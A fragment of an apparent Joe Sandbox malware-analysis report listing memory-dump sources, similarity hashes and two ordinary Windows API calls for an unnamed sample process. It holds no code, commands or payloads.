                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LocalTime
                • String ID: %.3d$X64
                • API String ID: 481472006-1077770165
                • Opcode ID: d39a228d03e7eaf4bd72f029eb2230592525c3f95f338bca41af64d8f2a87d75
                • Instruction ID: 9d8200818b1132af1d678d6bc365530a2fb7cdfd9f207cb036a825cb74ad8aed
                • Opcode Fuzzy Hash: d39a228d03e7eaf4bd72f029eb2230592525c3f95f338bca41af64d8f2a87d75
                • Instruction Fuzzy Hash: C8D062B1C1411DE6CF909AA0DDC99FEB3FCA728700F5044E2FA16D6160E674D54D9721
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00BDC233
                • GetLastError.KERNEL32 ref: 00BDC241
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDC29C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                • Opcode ID: 00d6a98a93467902b47bfe8fb618ace86b3a7204579360f85bf3c8968e21e6bd
                • Instruction ID: d5033ca92019a42b1ea09febed9a2b829ea5cc9472c3e503f3e9bc2c1e90aaa5
                • Opcode Fuzzy Hash: 00d6a98a93467902b47bfe8fb618ace86b3a7204579360f85bf3c8968e21e6bd
                • Instruction Fuzzy Hash: 01419271600217AFCB258FE5D844BBAFFE5EF45720F2441EAE859A72A1EB308D01D750
                Uniqueness

                Uniqueness Score: -1.00%